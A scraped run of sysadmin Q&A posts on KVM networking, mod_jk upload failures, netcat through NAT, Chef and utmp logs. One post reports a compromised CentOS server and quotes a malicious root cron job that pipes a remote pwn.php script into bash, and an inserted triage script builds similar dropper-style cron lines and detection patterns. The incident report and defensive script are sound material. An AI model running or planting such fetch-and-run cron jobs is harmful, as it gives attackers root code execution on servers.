virsh domifaddr shows nothing. Trying to setup IP address on guest similar to host

I am trying to get my guest machine to have an IP similar to its host machine. The address on the host is 10.75.1.239, the address on the guest I want to be: 10.75.1.187.

I can set up the guest to have the IP I want by editing /etc/sysconfig/network-scripts/ifcfg-eth0:

BOOTPRO=none
NAME=eth0
DEVICE=eth0
ONBOOT=yes
IPADDR=10.75.1.187
GATEWAY=10.75.0.1

The host machine’s /etc/sysconfig/network setup is as such:

NETWORKING=yes
HOSTNAME=test-vm-server1
NTPSERVERARGS=iburst
GATEWAY=10.75.0.1

If I use virt-manager to pop onto the guest machine and do an ip a, it shows the IP as being what I set it to.

But if I am on the host machine of that guest, then doing an `ssh root@10.75.1.187` comes back with:

ssh: connect to host 10.75.1.187 port 22: No route to host

I double-checked that ssh is indeed running. Not sure what other configs for this CentOS guest on KVM (virt-manager) to test/check?

(Before I mucked with the file it had a 192.168.122.67 IP address I could ssh to.) What I didn’t test and wish I had was if it could see the outside network, I am guessing it could since I could ssh into it. This new box whose IP address is set to 10.75.1.187 I cannot ping out to anything really, so guessing something else I am missing in configuring the network. Not a lot of experience here so knowing what files to open and what edits to make is difficult.

How did installing this RPM create a file?

Running yum install https://extras.getpagespeed.com/redhat/7/noarch/RPMS/getpagespeed-extras-release-7-1.el7.gps.noarch.rpm creates /etc/cron.d/sysstat2 but RPM disavows the file:

# rpm -ql getpagespeed-extras-release
/etc/pki/rpm-gpg/RPM-GPG-KEY-GETPAGESPEED
/etc/yum.repos.d/getpagespeed-extras.repo
# rpm -qf /etc/cron.d/sysstat2
file /etc/cron.d/sysstat2 is not owned by any package

How did the RPM create the file and how do I see what else it did?

CentOS 7 hacked [duplicate]


A new file showed up at 07:07 EDT on one of my servers today:

# ll /etc/cron.d/sysstat2
-rw-r--r-- 1 root root 92 Jun 24 07:07 /etc/cron.d/sysstat2
# cat /etc/cron.d/sysstat2
53 * * * * root /bin/bash <(curl -s https://www.sayitwithagift.com/pwn.php) >/dev/null 2>&1

Luckily, whoever put it there screwed up, because every hour since I’ve received an email from cron saying:

/bin/sh: -c: line 0: syntax error near unexpected token `('
/bin/sh: -c: line 0: `/bin/bash <(curl -s https://www.sayitwithagift.com/pwn.php) >/dev/null 2>&1'

07:07 is when cron ran its dailies:

Jun 24 07:07:10 run-parts(/etc/cron.daily)[4989]: starting logrotate
Jun 24 07:07:10 run-parts(/etc/cron.daily)[16936]: finished logrotate
Jun 24 07:07:10 run-parts(/etc/cron.daily)[4989]: starting man-db.cron
Jun 24 07:07:11 run-parts(/etc/cron.daily)[16947]: finished man-db.cron
Jun 24 07:07:11 run-parts(/etc/cron.daily)[4989]: starting mlocate
Jun 24 07:07:16 run-parts(/etc/cron.daily)[16958]: finished mlocate
Jun 24 07:07:16 run-parts(/etc/cron.daily)[4989]: starting rkhunter

The only thing /var/log/messages shows for that time:

Jun 24 07:07:09 yum[5617]: Installed: getpagespeed-extras-release.noarch 7-1.el7.gps
Jun 24 07:07:09 yum[5617]: Erased: getpagespeed-extras

which is confirmed by /var/log/yum:

Jun 24 07:07:09 Installed: getpagespeed-extras-release.noarch 7-1.el7.gps
Jun 24 07:07:09 Erased: getpagespeed-extras

but the file does not appear to have actually come with that package:

# rpm -ql getpagespeed-extras-release
/etc/pki/rpm-gpg/RPM-GPG-KEY-GETPAGESPEED
/etc/yum.repos.d/getpagespeed-extras.repo

or any package:

# rpm -qf /etc/cron.d/sysstat2
file /etc/cron.d/sysstat2 is not owned by any package

Server is set up for public key authentication only, and I just confirmed that by trying to connect from a different host:

# ssh -l root -p 57313 example.com
Permission denied (publickey).

yum update says I’m fully patched. I don’t know where to go from here.
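
Added example, not part of either post above: a POSIX shell triage script that generalizes the manual rpm -ql / rpm -qf checks from the two posts about /etc/cron.d/sysstat2. It flags cron drop-ins that no package owns and any cron or RPM scriptlet line that downloads content and hands it straight to a shell; the function names and the example.invalid sample jobs are constructed for illustration.

```shell
#!/bin/sh
# Added example: triage of cron drop-ins and RPM scriptlets on an RPM-based host.
# Function names are hypothetical; sample jobs in demo() are constructed and
# example.invalid is a placeholder host.

# Return 0 if a line downloads something and hands it straight to a shell.
is_fetch_and_run() {
    # Fetcher piped into a shell:  curl ... | sh
    printf '%s\n' "$1" | grep -Eq \
        '(curl|wget)[^|]*[|][[:space:]]*([^[:space:]]*/)?(ba|da|z|k)?sh([[:space:]]|$)' \
        && return 0
    # Shell fed by a substitution:  bash <(curl ...)  or  sh -c "$(wget ...)"
    printf '%s\n' "$1" | grep -Eq \
        '(ba|da|z|k)?sh[[:space:]].*(<\(|\$\(|`)[[:space:]]*(curl|wget)([[:space:]]|$)' \
        && return 0
    return 1
}

# Read lines on stdin and report the suspicious ones; $1 labels the source.
scan_lines() {
    while IFS= read -r line || [ -n "$line" ]; do
        case "$line" in '#'*|'') continue ;; esac
        if is_fetch_and_run "$line"; then
            printf 'FETCH-AND-RUN %s: %s\n' "$1" "$line"
        fi
    done
}

# Check every file in a cron directory: package ownership, then content.
scan_cron_dir() {
    for f in "$1"/*; do
        [ -f "$f" ] || continue
        # rpm -qf exits non-zero when no installed package owns the file.
        if command -v rpm >/dev/null 2>&1 && ! rpm -qf "$f" >/dev/null 2>&1; then
            printf 'UNOWNED %s\n' "$f"
        fi
        scan_lines "$f" < "$f"
    done
}

# Scriptlets and triggers run as root at install/erase time and are not part
# of the file list, so they are inspected separately.
scan_pkg_scriptlets() {
    command -v rpm >/dev/null 2>&1 || { echo "rpm not available" >&2; return 2; }
    for pkg in "$@"; do
        rpm -q --scripts --triggers "$pkg" 2>/dev/null | scan_lines "scriptlet:$pkg"
    done
}

# Constructed sample: one stock sysstat-style job and two dropper-style jobs.
demo() {
    d=$(mktemp -d) || return 1
    printf '%s\n' '*/10 * * * * root /usr/lib64/sa/sa1 1 1' > "$d/sysstat"
    printf '%s\n' \
        '53 * * * * root /bin/bash <(curl -s https://example.invalid/p) >/dev/null 2>&1' \
        > "$d/sysstat2"
    printf '%s\n' '# nightly' \
        '0 3 * * * root curl -fsS https://example.invalid/i | sh' > "$d/update"
    scan_cron_dir "$d"
    rm -rf "$d"
}

# With an argument, scan that directory (e.g. /etc/cron.d); otherwise run the demo.
if [ $# -gt 0 ]; then scan_cron_dir "$1"; else demo; fi
```

RPM scriptlets can create files that never appear in rpm -ql, which is why scan_pkg_scriptlets looks there; a package that has already been erased can only be inspected from its .rpm file with rpm -qp --scripts.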

Sporadic SSL_read errors when uploading large files through mod/jk with curl

I have a nightly backup script that has been working reliably for 6 years, and two months ago, it began to fail to upload to my archive server (only about 1 in 4 attempts succeed). This started to happen once the size of the backup file surpassed about 440MB (successful uploads take 20-40 seconds to complete). Other, smaller files (>200MB) are uploading successfully every time.

Here are the details of the file I am uploading:

-rw-r--r-- 1 backup backup 486948951 Jun 12 13:20 snapshot-20190612.zip 

These files are uploaded to my server with a curl PUT (see command below). The source server is an Amazon Linux instance in Virginia, and the destination server is an Amazon Linux instance in Ohio (both are in the US East region).

The web service that handles the upload is an Apache HTTPD 2.4.39 + mod24_ssl/OpenSSL 1.0.2k -> mod_jk 1.2.42 -> Apache Tomcat 8.5.40 -> Artifactory 5.3.2 instance.


My mod/jk workers.properties file:

worker.list=main_ajp13_worker
# Set properties for main_ajp13_worker (ajp13)
worker.main_ajp13_worker.type=ajp13
worker.main_ajp13_worker.host=localhost
worker.main_ajp13_worker.port=8009

The following is the console output (authorization details scrubbed) from a failed upload, followed immediately by a successful upload:

-bash-4.2$ curl -v -k -u backup:PASSWORD -H X-Checksum-Sha1:6b9525bf9bb572ec7f70d0d474cb6533e0091bd3 -H X-Checksum-Md5:6da0c444ad1b53dc1cf06784e204cb10 -T snapshot-20190612.zip https://repo.mydomain.org/resource-snapshot/snapshot/20190612/snapshot-20190612.zip
*   Trying 123.222.100.132...
* TCP_NODELAY set
* Connected to repo.mydomain.org (123.222.100.132) port 443 (#0)
* ALPN, offering h2
* ALPN, offering http/1.1
* Cipher selection: ALL:!EXPORT:!EXPORT40:!EXPORT56:!aNULL:!LOW:!RC4:@STRENGTH
* successfully set certificate verify locations:
*   CAfile: /etc/pki/tls/certs/ca-bundle.crt
  CApath: none
* TLSv1.2 (OUT), TLS header, Certificate Status (22):
* TLSv1.2 (OUT), TLS handshake, Client hello (1):
* TLSv1.2 (IN), TLS handshake, Server hello (2):
* TLSv1.2 (IN), TLS handshake, Certificate (11):
* TLSv1.2 (IN), TLS handshake, Server key exchange (12):
* TLSv1.2 (IN), TLS handshake, Server finished (14):
* TLSv1.2 (OUT), TLS handshake, Client key exchange (16):
* TLSv1.2 (OUT), TLS change cipher, Change cipher spec (1):
* TLSv1.2 (OUT), TLS handshake, Finished (20):
* TLSv1.2 (IN), TLS change cipher, Change cipher spec (1):
* TLSv1.2 (IN), TLS handshake, Finished (20):
* SSL connection using TLSv1.2 / ECDHE-RSA-AES128-GCM-SHA256
* ALPN, server accepted to use http/1.1
* Server certificate:
*  subject: OU=Domain Control Validated; OU=PositiveSSL Wildcard; CN=*.mydomain.org
*  start date: May 28 00:00:00 2019 GMT
*  expire date: May 27 23:59:59 2021 GMT
*  issuer: C=GB; ST=Greater Manchester; L=Salford; O=Sectigo Limited; CN=Sectigo RSA Domain Validation Secure Server CA
*  SSL certificate verify ok.
* Server auth using Basic with user 'backup'
> PUT /resource-snapshot/snapshot/20190612/snapshot-20190612.zip HTTP/1.1
> Host: repo.mydomain.org
> Authorization: Basic DELETED_TOKEN
> User-Agent: curl/7.61.1
> Accept: */*
> X-Checksum-Sha1:6b9525bf9bb572ec7f70d0d474cb6533e0091bd3
> X-Checksum-Md5:6da0c444ad1b53dc1cf06784e204cb10
> Content-Length: 486948951
> Expect: 100-continue
>
< HTTP/1.1 100 Continue
* OpenSSL SSL_read: SSL_ERROR_SYSCALL, errno 104
* Closing connection 0
curl: (56) OpenSSL SSL_read: SSL_ERROR_SYSCALL, errno 104

-bash-4.2$ curl -v -u backup:PASSWORD -H X-Checksum-Sha1:6b9525bf9bb572ec7f70d0d474cb6533e0091bd3 -H X-Checksum-Md5:6da0c444ad1b53dc1cf06784e204cb10 -T snapshot-20190612.zip https://repo.mydomain.org/resource-snapshot/snapshot/20190612/snapshot-20190612.zip
*   Trying 123.222.100.132...
* TCP_NODELAY set
* Connected to repo.mydomain.org (123.222.100.132) port 443 (#0)
* ALPN, offering h2
* ALPN, offering http/1.1
* Cipher selection: ALL:!EXPORT:!EXPORT40:!EXPORT56:!aNULL:!LOW:!RC4:@STRENGTH
* successfully set certificate verify locations:
*   CAfile: /etc/pki/tls/certs/ca-bundle.crt
  CApath: none
* TLSv1.2 (OUT), TLS header, Certificate Status (22):
* TLSv1.2 (OUT), TLS handshake, Client hello (1):
* TLSv1.2 (IN), TLS handshake, Server hello (2):
* TLSv1.2 (IN), TLS handshake, Certificate (11):
* TLSv1.2 (IN), TLS handshake, Server key exchange (12):
* TLSv1.2 (IN), TLS handshake, Server finished (14):
* TLSv1.2 (OUT), TLS handshake, Client key exchange (16):
* TLSv1.2 (OUT), TLS change cipher, Change cipher spec (1):
* TLSv1.2 (OUT), TLS handshake, Finished (20):
* TLSv1.2 (IN), TLS change cipher, Change cipher spec (1):
* TLSv1.2 (IN), TLS handshake, Finished (20):
* SSL connection using TLSv1.2 / ECDHE-RSA-AES128-GCM-SHA256
* ALPN, server accepted to use http/1.1
* Server certificate:
*  subject: OU=Domain Control Validated; OU=PositiveSSL Wildcard; CN=*.mydomain.org
*  start date: May 28 00:00:00 2019 GMT
*  expire date: May 27 23:59:59 2021 GMT
*  issuer: C=GB; ST=Greater Manchester; L=Salford; O=Sectigo Limited; CN=Sectigo RSA Domain Validation Secure Server CA
*  SSL certificate verify ok.
* Server auth using Basic with user 'backup'
> PUT /resource-snapshot/snapshot/20190612/snapshot-20190612.zip HTTP/1.1
> Host: repo.mydomain.org
> Authorization: Basic DELETED_TOKEN
> User-Agent: curl/7.61.1
> Accept: */*
> X-Checksum-Sha1:6b9525bf9bb572ec7f70d0d474cb6533e0091bd3
> X-Checksum-Md5:6da0c444ad1b53dc1cf06784e204cb10
> Content-Length: 486948951
> Expect: 100-continue
>
< HTTP/1.1 100 Continue
* OpenSSL SSL_read: SSL_ERROR_SYSCALL, errno 104
* Closing connection 0
curl: (56) OpenSSL SSL_read: SSL_ERROR_SYSCALL, errno 104

With a second (or often third or fourth) attempt of the upload, it eventually succeeds:

-bash-4.2$ curl -v -u backup:PASSWORD -H X-Checksum-Sha1:6b9525bf9bb572ec7f70d0d474cb6533e0091bd3 -H X-Checksum-Md5:6da0c444ad1b53dc1cf06784e204cb10 -T snapshot-20190612.zip https://repo.mydomain.org/resource-snapshot/snapshot/20190612/snapshot-20190612.zip
*   Trying 123.222.100.132...
* TCP_NODELAY set
* Connected to repo.mydomain.org (123.222.100.132) port 443 (#0)
* ALPN, offering h2
* ALPN, offering http/1.1
* Cipher selection: ALL:!EXPORT:!EXPORT40:!EXPORT56:!aNULL:!LOW:!RC4:@STRENGTH
* successfully set certificate verify locations:
*   CAfile: /etc/pki/tls/certs/ca-bundle.crt
  CApath: none
* TLSv1.2 (OUT), TLS header, Certificate Status (22):
* TLSv1.2 (OUT), TLS handshake, Client hello (1):
* TLSv1.2 (IN), TLS handshake, Server hello (2):
* TLSv1.2 (IN), TLS handshake, Certificate (11):
* TLSv1.2 (IN), TLS handshake, Server key exchange (12):
* TLSv1.2 (IN), TLS handshake, Server finished (14):
* TLSv1.2 (OUT), TLS handshake, Client key exchange (16):
* TLSv1.2 (OUT), TLS change cipher, Change cipher spec (1):
* TLSv1.2 (OUT), TLS handshake, Finished (20):
* TLSv1.2 (IN), TLS change cipher, Change cipher spec (1):
* TLSv1.2 (IN), TLS handshake, Finished (20):
* SSL connection using TLSv1.2 / ECDHE-RSA-AES128-GCM-SHA256
* ALPN, server accepted to use http/1.1
* Server certificate:
*  subject: OU=Domain Control Validated; OU=PositiveSSL Wildcard; CN=*.mydomain.org
*  start date: May 28 00:00:00 2019 GMT
*  expire date: May 27 23:59:59 2021 GMT
*  issuer: C=GB; ST=Greater Manchester; L=Salford; O=Sectigo Limited; CN=Sectigo RSA Domain Validation Secure Server CA
*  SSL certificate verify ok.
* Server auth using Basic with user 'backup'
> PUT /resource-snapshot/snapshot/20190612/snapshot-20190612.zip HTTP/1.1
> Host: repo.mydomain.org
> Authorization: Basic DELETED_TOKEN
> User-Agent: curl/7.61.1
> Accept: */*
> X-Checksum-Sha1:6b9525bf9bb572ec7f70d0d474cb6533e0091bd3
> X-Checksum-Md5:6da0c444ad1b53dc1cf06784e204cb10
> Content-Length: 486948951
> Expect: 100-continue
>
< HTTP/1.1 100 Continue
* We are completely uploaded and fine
< HTTP/1.1 201 201
< Date: Wed, 12 Jun 2019 13:22:46 GMT
< Server: Apache
< Strict-Transport-Security: max-age=15768000
< X-Artifactory-Id: 9e49bf90cd4b7700:7ba45cf1:16b1db56e4d:-8000
< Location: https://repo.mydomain.org/resource-snapshot/snapshot/20190612/snapshot-20190612.zip
< Transfer-Encoding: chunked
< Content-Type: application/vnd.org.jfrog.artifactory.storage.itemcreated+json;charset=ISO-8859-1
<
{
  "repo" : "resource-snapshot",
  "path" : "/snapshot/20190612/snapshot-20190612.zip",
  "created" : "2019-06-12T13:23:05.805Z",
  "createdBy" : "backup",
  "downloadUri" : "https://repo.mydomain.org/resource-snapshot/snapshot/20190612/snapshot-20190612.zip",
  "mimeType" : "application/zip",
  "size" : "486948951",
  "checksums" : {
    "sha1" : "6b9525bf9bb572ec7f70d0d474cb6533e0091bd3",
    "md5" : "6da0c444ad1b53dc1cf06784e204cb10"
  },
  "originalChecksums" : {
    "sha1" : "6b9525bf9bb572ec7f70d0d474cb6533e0091bd3",
    "md5" : "6da0c444ad1b53dc1cf06784e204cb10"
  },
  "uri" : "https://repo.mydomain.org/resource-snapshot/snapshot/20190612/snapshot-20190612.zip"
* Connection #0 to host repo.mydomain.org left intact
}

The server logs aren’t particularly informative. Here are the relevant logs when an upload fails:

/var/log/httpd/ssl_request_log

[24/Jun/2019:12:17:45 +0000] 52.1.100.190 TLSv1.2 ECDHE-RSA-AES128-GCM-SHA256 "PUT /resource-snapshot/snapshot/20190612/snapshot-20190612.zip HTTP/1.1" - 

/var/log/httpd/repo.mydomain.org-ssl_access_log

140.1.100.101 - - [24/Jun/2019:12:17:45 +0000] "PUT /resource-snapshot/snapshot/20190612/snapshot-20190612.zip HTTP/1.1" 400 - 

catalina.out

No log entries.

/var/log/httpd/mod_jk.log

These are the logs when the mod/jk log level is set to info:

[Mon Jun 24 12:18:05 2019] [15679:140534117611584] [info] ajp_read_into_msg_buff::jk_ajp_common.c (1553): (main_ajp13_worker) receiving data from client failed. Connection aborted or network problems
[Mon Jun 24 12:18:05 2019] [15679:140534117611584] [info] ajp_process_callback::jk_ajp_common.c (2105): (main_ajp13_worker) Reading from client aborted or client network problems
[Mon Jun 24 12:18:05 2019] [15679:140534117611584] [info] ajp_service::jk_ajp_common.c (2778): (main_ajp13_worker) sending request to tomcat failed (unrecoverable), because of client read error (attempt=1)
[Mon Jun 24 12:18:05 2019] [15679:140534117611584] [info] jk_handler::mod_jk.c (2988): Aborting connection for worker=main_ajp13_worker

And here is the relevant part of the 2.4 million mod_jk log entries at the debug level, starting right at the HTTP 100 Continue and showing the very start of the file upload (you can see the magic number of the zip file, 50 4B 03 04):

[Mon Jun 24 14:37:08 2019] [17826:139891516274752] [debug] ajp_connection_tcp_send_message::jk_ajp_common.c (1267): 0160    32 65 32 00 A0 08 00 09 34 39 36 32 37 38 36 30  - 2e2.....49627860
[Mon Jun 24 14:37:08 2019] [17826:139891516274752] [debug] ajp_connection_tcp_send_message::jk_ajp_common.c (1267): 0170    33 00 00 06 45 78 70 65 63 74 00 00 0C 31 30 30  - 3...Expect...100
[Mon Jun 24 14:37:08 2019] [17826:139891516274752] [debug] ajp_connection_tcp_send_message::jk_ajp_common.c (1267): 0180    2D 63 6F 6E 74 69 6E 75 65 00 0A 00 0F 41 4A 50  - -continue....AJP
[Mon Jun 24 14:37:08 2019] [17826:139891516274752] [debug] ajp_connection_tcp_send_message::jk_ajp_common.c (1267): 0190    5F 52 45 4D 4F 54 45 5F 50 4F 52 54 00 00 05 33  - _REMOTE_PORT...3
[Mon Jun 24 14:37:08 2019] [17826:139891516274752] [debug] ajp_connection_tcp_send_message::jk_ajp_common.c (1267): 01a0    32 39 37 30 00 0A 00 0E 41 4A 50 5F 4C 4F 43 41  - 2970....AJP_LOCA
[Mon Jun 24 14:37:08 2019] [17826:139891516274752] [debug] ajp_connection_tcp_send_message::jk_ajp_common.c (1267): 01b0    4C 5F 41 44 44 52 00 00 0C 31 37 32 2E 33 31 2E  - L_ADDR...172.31.
[Mon Jun 24 14:37:08 2019] [17826:139891516274752] [debug] ajp_connection_tcp_send_message::jk_ajp_common.c (1267): 01c0    31 33 2E 39 36 00 0A 00 10 4A 4B 5F 4C 42 5F 41  - 13.96....JK_LB_A
[Mon Jun 24 14:37:08 2019] [17826:139891516274752] [debug] ajp_connection_tcp_send_message::jk_ajp_common.c (1267): 01d0    43 54 49 56 41 54 49 4F 4E 00 00 03 41 43 54 00  - CTIVATION...ACT.
[Mon Jun 24 14:37:08 2019] [17826:139891516274752] [debug] ajp_connection_tcp_send_message::jk_ajp_common.c (1267): 01e0    0A 00 0F 53 53 4C 5F 43 4C 49 45 4E 54 5F 43 45  - ...SSL_CLIENT_CE
[Mon Jun 24 14:37:08 2019] [17826:139891516274752] [debug] ajp_connection_tcp_send_message::jk_ajp_common.c (1267): 01f0    52 54 00 00 0F 53 53 4C 5F 43 4C 49 45 4E 54 5F  - RT...SSL_CLIENT_
[Mon Jun 24 14:37:08 2019] [17826:139891516274752] [debug] ajp_connection_tcp_send_message::jk_ajp_common.c (1267): 0200    43 45 52 54 00 FF 00 00 00 00 00 00 00 00 00 00  - CERT............
[Mon Jun 24 14:37:08 2019] [17826:139891516274752] [debug] ajp_send_request::jk_ajp_common.c (1782): (main_ajp13_worker) request body to send 496278603 - request body to resend 0
[Mon Jun 24 14:37:08 2019] [17826:139891516274752] [debug] ajp_send_request::jk_ajp_common.c (1886): (main_ajp13_worker) sending 8186 bytes of request body
[Mon Jun 24 14:37:08 2019] [17826:139891516274752] [debug] ajp_connection_tcp_send_message::jk_ajp_common.c (1267): sending to ajp13 pos=4 len=8192 max=8192
[Mon Jun 24 14:37:08 2019] [17826:139891516274752] [debug] ajp_connection_tcp_send_message::jk_ajp_common.c (1267): 0000    12 34 1F FC 1F FA 50 4B 03 04 14 00 00 00 08 00  - .4....PK........
[Mon Jun 24 14:37:08 2019] [17826:139891516274752] [debug] ajp_connection_tcp_send_message::jk_ajp_common.c (1267): 0010    84 61 D8 4E 73 67 93 AF 7C 0A 00 00 E0 B0 00 00  - .a.Nsg..|.......
[Mon Jun 24 14:37:08 2019] [17826:139891516274752] [debug] ajp_connection_tcp_send_message::jk_ajp_common.c (1267): 0020    0A 00 1C 00 62 61 63 6B 75 70 2E 6C 6F 67 55 54  - ....backup.logUT
[Mon Jun 24 14:37:08 2019] [17826:139891516274752] [debug] ajp_connection_tcp_send_message::jk_ajp_common.c (1267): 0030    09 00 03 18 BE 10 5D 90 BD 10 5D 75 78 0B 00 01  - ......]...]ux...
[Mon Jun 24 14:37:08 2019] [17826:139891516274752] [debug] ajp_connection_tcp_send_message::jk_ajp_common.c (1267): 0040    04 1A 00 00 00 04 1A 00 00 00 ED 5C 4D 6F DC C8  - ...........\Mo..
[Mon Jun 24 14:37:08 2019] [17826:139891516274752] [debug] ajp_connection_tcp_send_message::jk_ajp_common.c (1267): 0050    11 BD E7 57 34 74 4A 80 D8 80 77 17 8B 45 80 1C  - ...W4tJ...w..E..

.... [lots of encoded data trimmed out here, the next part shows re-filling the 8k buffer] ....

[Mon Jun 24 14:37:08 2019] [17826:139891516274752] [debug] ajp_connection_tcp_get_message::jk_ajp_common.c (1462): received from ajp13 pos=0 len=3 max=8192E D7 E9 E6 DD BB  - 8...U?.er.>.....
[Mon Jun 24 14:37:08 2019] [17826:139891516274752] [debug] ajp_connection_tcp_get_message::jk_ajp_common.c (1462): 00000   06 1F FA 00 00 00 00 00 00 00 00 00 00 00 00 00  - .................
[Mon Jun 24 14:37:08 2019] [17826:139891516274752] [debug] ajp_connection_tcp_send_message::jk_ajp_common.c (1267): sending to ajp13 pos=4 len=8192 max=8192 2E 40 41 4C 94  - ..$  z~YW.?1G.@AL.
[Mon Jun 24 14:37:08 2019] [17826:139891516274752] [debug] ajp_connection_tcp_send_message::jk_ajp_common.c (1267): 0000    12 34 1F FC 1F FA C9 62 3E 48 C5 70 E9 05 E1 8D  - .4.....b>H.p....

.... [lots of encoded data trimmed out here, the next part shows where re-filling the 8k buffer fails] ....

[Mon Jun 24 14:37:28 2019] [17826:139891516274752] [debug] ajp_connection_tcp_send_message::jk_ajp_common.c (1267): 03e0    2D E5 36 F3 8C 12 8C 51 69 66 21 AE A5 58 BE 6E  - -.6....Qif!..X.n
[Mon Jun 24 14:37:28 2019] [17826:139891516274752] [debug] ajp_connection_tcp_send_message::jk_ajp_common.c (1267): 03f0    57 F3 F4 EC CB E9 49 9B 59 44 AB FE 66 6E 67 DC  - W.....I.YD..fng.
[Mon Jun 24 14:37:28 2019] [17826:139891516274752] [debug] ajp_connection_tcp_get_message::jk_ajp_common.c (1462): received from ajp13 pos=0 len=3 max=8192
[Mon Jun 24 14:37:28 2019] [17826:139891516274752] [debug] ajp_connection_tcp_get_message::jk_ajp_common.c (1462): 0000   06 1F FA 00 00 00 00 00 00 00 00 00 00 00 00 00  - ................
[Mon Jun 24 14:37:28 2019] [17826:139891516274752] [info] ajp_read_into_msg_buff::jk_ajp_common.c (1553): (main_ajp13_worker) receiving data from client failed. Connection aborted or network problems
[Mon Jun 24 14:37:28 2019] [17826:139891516274752] [info] ajp_process_callback::jk_ajp_common.c (2105): (main_ajp13_worker) Reading from client aborted or client network problems
[Mon Jun 24 14:37:28 2019] [17826:139891516274752] [info] ajp_service::jk_ajp_common.c (2778): (main_ajp13_worker) sending request to tomcat failed (unrecoverable), because of client read error (attempt=1)
[Mon Jun 24 14:37:28 2019] [17826:139891516274752] [debug] ajp_reset_endpoint::jk_ajp_common.c (851): (main_ajp13_worker) resetting endpoint with socket 24 (socket shutdown)
[Mon Jun 24 14:37:28 2019] [17826:139891516274752] [debug] ajp_abort_endpoint::jk_ajp_common.c (821): (main_ajp13_worker) aborting endpoint with socket 24
[Mon Jun 24 14:37:28 2019] [17826:139891516274752] [debug] jk_shutdown_socket::jk_connect.c (932): About to shutdown socket 24 [127.0.0.1:38678 -> 127.0.0.1:8009]
[Mon Jun 24 14:37:28 2019] [17826:139891516274752] [debug] jk_shutdown_socket::jk_connect.c (1005): shutting down the read side of socket 24 [127.0.0.1:38678 -> 127.0.0.1:8009]
[Mon Jun 24 14:37:28 2019] [17826:139891516274752] [debug] jk_shutdown_socket::jk_connect.c (1016): Shutdown socket 24 [127.0.0.1:38678 -> 127.0.0.1:8009] and read 265 lingering bytes in 0 sec.
[Mon Jun 24 14:37:28 2019] [17826:139891516274752] [debug] ajp_done::jk_ajp_common.c (3287): recycling connection pool for worker main_ajp13_worker and socket -1
[Mon Jun 24 14:37:28 2019] [17826:139891516274752] [info] jk_handler::mod_jk.c (2988): Aborting connection for worker=main_ajp13_worker
[Mon Jun 24 14:38:24 2019] [17825:139891516274752] [debug] wc_shutdown::jk_worker.c (390): Shutting down worker main_ajp13_worker
[Mon Jun 24 14:38:24 2019] [17825:139891516274752] [debug] jk_shm_close::jk_shm.c (745): Closed shared memory /var/log/httpd/mod_jk.shm.17823 childs=9
[Mon Jun 24 14:38:24 2019] [17877:139891516274752] [debug] wc_shutdown::jk_worker.c (390): Shutting down worker main_ajp13_worker

In the above logs, I counted the number of times the 8k buffer was re-filled (36,856 times), and found that 302,071,776 bytes (62%) of the file was transferred before the error occurred.


My interpretation of the above logs

The SSL handshake is succeeding, and the error occurs after the HTTP 100 Continue, so I suspect that the file has been partially sent prior to the following messages in mod_jk.log:

  • receiving data from client failed. Connection aborted or network problems
  • sending request to tomcat failed (unrecoverable), because of client read error (attempt=1)

Since there are no errors in catalina.out, and mod/jk is complaining about a client read error, I believe this rules out Tomcat itself (and the web application, Artifactory).

Most of the comments I see with a Google search on the above mod/jk messages state that they are transient network errors, but I’m not buying that since these are file transfers between two EC2 instances in the same region. I am also interpreting this as not having anything to do with a connection timeout, as that would (I think) produce a “Connection timed out after n milliseconds” message.

As a final test, I bypassed Apache HTTPD and mod/jk by uploading directly to Tomcat via port 8443 (still using SSL). These requests succeeded every time. This leads me to believe that the problem is with Apache HTTPD and/or mod/jk, and is not caused by “transient network errors”.


My Question

Are there any configuration options that I should look into for HTTPD and/or mod/jk to eliminate these problems?

Alternatively, is there any way to tell curl (and/or mod/jk) to attempt to handle these failed buffer re-fills in a fault tolerant way, so that the uploads can successfully complete?

Can I netcat through my gateway (NAT router) without configuring the router? [on hold]

I’m (kinda) new to networking. I don’t know if you understand my question. I wrote a simple program to listen to port 8080 on my PC. Netcat to localhost:8080 works perfectly fine (as expected), but now I want to reach it from the public internet. Of course, I can’t just netcat to my router at the same port, since my router didn’t open port 8080. Is it possible to use the netcat command to connect to my router and then to my private PC (from the internet), since I know my public and private IP? I imagine something like:

nc router_public_ip 113 my_private_ip 8080 

If it is possible with ssh/telnet or something else, I’ll be happy with that too. Or do I need to set up a tunnel/VPN to accomplish that?

Chef, dynamic value for one host

I am configuring a proftpd server running on port 2222. I would like to disable sftp on 22, which I can do by commenting out the sftp line in sshd.config.

There is an ssh recipe that is part of another cookbook which drops sshd.config, but I am using a different cookbook for proftp. How can we get sshd_config updated without 2 recipe runs?

writing logs in /var/adm/utmp vs /var/adm/utmpx

I have 2 similar RHEL6 servers but they behave differently: while one creates login records in /var/adm/utmp, the other logs in /var/adm/utmpx. Both have the same kernel and grub.conf configuration.

We’re planning on replacing these servers soon but still, it puzzles me.

Here are the grub.conf files for each:

Server1:

# grub.conf generated by anaconda
#
# Note that you do not have to rerun grub after making changes to this file
# NOTICE:  You have a /boot partition.  This means that
#          all kernel and initrd paths are relative to /boot/, eg.
#          root (hd0,0)
#          kernel /vmlinuz-version ro root=/dev/mapper/rootVG-rootVol
#          initrd /initrd-[generic-]version.img
#boot=/dev/sda
default=0
timeout=5
splashimage=(hd0,0)/grub/splash.xpm.gz
hiddenmenu
password --encrypted <removed>
title Red Hat Enterprise Linux Server (2.6.32-754.14.2.el6.x86_64)
    root (hd0,0)
    kernel /vmlinuz-2.6.32-754.14.2.el6.x86_64 ro root=/dev/mapper/rootVG- rootVol rd_NO_LUKS LANG=en_US.UTF-8 rd_NO_MD SYSFONT=latarcyrheb-sun16 crashkernel=auto rd_LVM_LV=rootVG/rootVol  KEYBOARDTYPE=pc KEYTABLE=us rd_NO_DM rhgb quiet
    initrd /initramfs-2.6.32-754.14.2.el6.x86_64.img
title Red Hat Enterprise Linux Server (2.6.32-754.10.1.el6.x86_64)
        root (hd0,0)
        kernel /vmlinuz-2.6.32-754.10.1.el6.x86_64 ro root=/dev/mapper/rootVG-rootVol rd_NO_LUKS LANG=en_US.UTF-8 rd_NO_MD SYSFONT=latarcyrheb-sun16 crashkernel=auto rd_LVM_LV=rootVG/rootVol  KEYBOARDTYPE=pc KEYTABLE=us rd_NO_DM rhgb quiet
        initrd /initramfs-2.6.32-754.10.1.el6.x86_64.img

Here is server2:

# grub.conf generated by anaconda
#
# Note that you do not have to rerun grub after making changes to this file
# NOTICE:  You have a /boot partition.  This means that
#          all kernel and initrd paths are relative to /boot/, eg.
#          root (hd0,0)
#          kernel /vmlinuz-version ro root=/dev/mapper/rootVG-rootVol
#          initrd /initrd-[generic-]version.img
